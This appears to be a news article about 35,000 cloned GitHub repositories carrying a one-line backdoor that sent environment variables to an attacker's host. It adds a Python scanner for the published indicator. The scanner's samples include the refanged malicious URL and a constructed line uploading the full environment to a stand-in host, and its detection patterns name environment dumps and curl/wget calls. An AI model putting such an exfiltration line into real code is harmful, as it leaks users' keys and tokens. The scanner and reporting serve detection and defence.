Developer Stephen Lacy claims that he discovered 35,000 projects on GitHub that had been cloned, with malicious code injected into the copies to attack unsuspecting users of the service. GitHub removed most of the dangerous repositories after Lacy contacted the team.
The original repositories were not compromised in any way. They include such well-known projects as crypto, golang, python, js, bash, docker, k8s and others. Their copies, however, had a backdoor added to spread malware, the developer says.
Lacy found one open source project through a Google search and noticed the web address hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru in its code; he shared the find on Twitter. A GitHub search turned up over 35,000 files containing the malicious URL. As Bleeping Computer notes, that figure counts suspicious files rather than dangerous repositories, a point Lacy later corrected himself.
Of the 35,788 results, more than 13,000 belonged to a single repository, redhat-operator-ecosystem, which apparently is no longer on GitHub.
Other researchers found that the cloned repositories containing the malicious URL carried a one-line backdoor that extracted the user's environment variables. Attackers could thus steal important secrets, including API keys, tokens, Amazon AWS credentials and victims' cryptographic keys, and remotely execute arbitrary code on infected systems.
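As an added example (not code from the report or from any of the projects named), the following scanner refangs the indicator quoted above, searches a checkout for it, and additionally flags lines that match a constructed heuristic for "read the whole environment and talk to the network", the behaviour attributed to the one-line backdoor. The sample files, the heuristic patterns and the `collector.example.invalid` host are constructed for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# The indicator published in the report, in its defanged form.
DEFANGED_IOC = "hxxp://ovz1.j19544519.pr46m.vps.myjino[.]ru"

def refang(ioc):
    """Turn a defanged indicator (hxxp, [.]) back into a searchable string."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")

MALICIOUS_HOST = urlparse(refang(DEFANGED_IOC)).hostname

# Heuristic for the behaviour described in the report: one line that both reads
# the whole environment and reaches the network. Constructed patterns, not a
# published signature; expect to tune them per code base.
ENV_DUMP = re.compile(r"os\.environ\b|process\.env\b|\benv\b|getenv")
NET_CALL = re.compile(r"https?://|urlopen|requests\.|curl\b|wget\b|fetch\(")

def scan_text(text, path="<memory>"):
    """Return (path, line number, reason) for every suspicious line in text."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if MALICIOUS_HOST in line:
            findings.append((path, lineno, "known-indicator"))
        elif ENV_DUMP.search(line) and NET_CALL.search(line):
            findings.append((path, lineno, "env-exfil-heuristic"))
    return findings

def scan_tree(root, suffixes=(".py", ".js", ".sh", ".go", ".yaml", ".yml", "Dockerfile")):
    """Scan every file under root whose name ends with one of suffixes."""
    findings = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.name.endswith(suffixes):
            try:
                findings += scan_text(path.read_text(errors="replace"), str(path))
            except OSError:
                continue
    return findings

# Constructed sample files standing in for a suspect clone; setup.py is clean
# (it reads one variable and never touches the network) and must not be flagged.
SAMPLE_FILES = {
    "setup.py": "import os\nNAME = os.environ.get('PKG_NAME', 'demo')\n",
    "utils.py": "MIRROR = 'http://ovz1.j19544519.pr46m.vps.myjino.ru/pkg'\n",
    "build.sh": "#!/bin/sh\nupload \"$(env)\" https://collector.example.invalid/\n",
}

def scan_samples():
    return [f for name, text in SAMPLE_FILES.items() for f in scan_text(text, name)]

if __name__ == "__main__":
    for path, lineno, reason in scan_samples():
        print(f"{path}:{lineno}: {reason}")
```

Run `scan_tree(".")` inside a checkout to apply the same checks to real files; a "known-indicator" hit is a clear sign the clone is not the upstream project.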
In terms of timing, most of the cloned repositories received the malicious code in July, between 6 and 20 days ago, notes NIX Solutions. Bleeping Computer, however, came across repositories in which it appeared as far back as 2015.
GitHub reported on the issue yesterday; the dangerous clone repositories have been removed from the platform.